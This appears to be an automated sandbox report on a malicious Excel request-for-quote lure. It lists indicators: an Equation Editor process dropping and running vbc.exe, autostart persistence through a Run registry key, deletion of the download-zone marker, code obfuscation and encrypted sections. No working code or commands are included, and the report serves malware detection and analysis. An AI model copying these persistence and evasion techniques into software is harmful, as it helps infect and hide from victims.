Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tnvLnx.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.NET source code contains calls to encryption/decryption functions

Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE7AF.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Sample is known by Antivirus

Source: AGG POWER RFQ.xlsx	Virustotal: Detection: 27%
Source: AGG POWER RFQ.xlsx	ReversingLabs: Detection: 21%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: AGG POWER RFQ.xlsx

Static file information: File size 1376256 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: AGG POWER RFQ.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: AGG POWER RFQ.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD3BCE push es; ret		4_2_00AD3BDC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1122 push ecx; iretd		4_2_002B1123
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B117B push edx; iretd		4_2_002B117C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1144 push ecx; iretd		4_2_002B1145
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02003232 push esp; retf		4_2_02003233
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AD3BCE push es; ret		5_2_00AD3BDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00223868 pushfd ; iretd		5_2_0022386D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0022131F pushfd ; iretd		5_2_002213D9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00221390 pushfd ; iretd		5_2_002213D9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C58AB pushad ; retf		5_2_007C58C1
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00213BCE push es; ret		6_2_00213BDC
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00713232 push esp; retf		6_2_00713233
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00213BCE push es; ret		7_2_00213BDC
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_0044131F pushfd ; iretd		7_2_004413D9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00441390 pushfd ; iretd		7_2_004413D9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00371122 push ecx; ret		8_2_00371123
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00371144 push ecx; ret		8_2_00371145
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00713232 push esp; retf		8_2_00713233
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 9_2_002013D0 pushfd ; iretd		9_2_002013D9

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.65432769583
Source: initial sample	Static PE information: section name: .text entropy: 7.65432769583

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Creates an autostart registry key

Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx			Jump to behavior
Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\vbc.exe

File opened: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
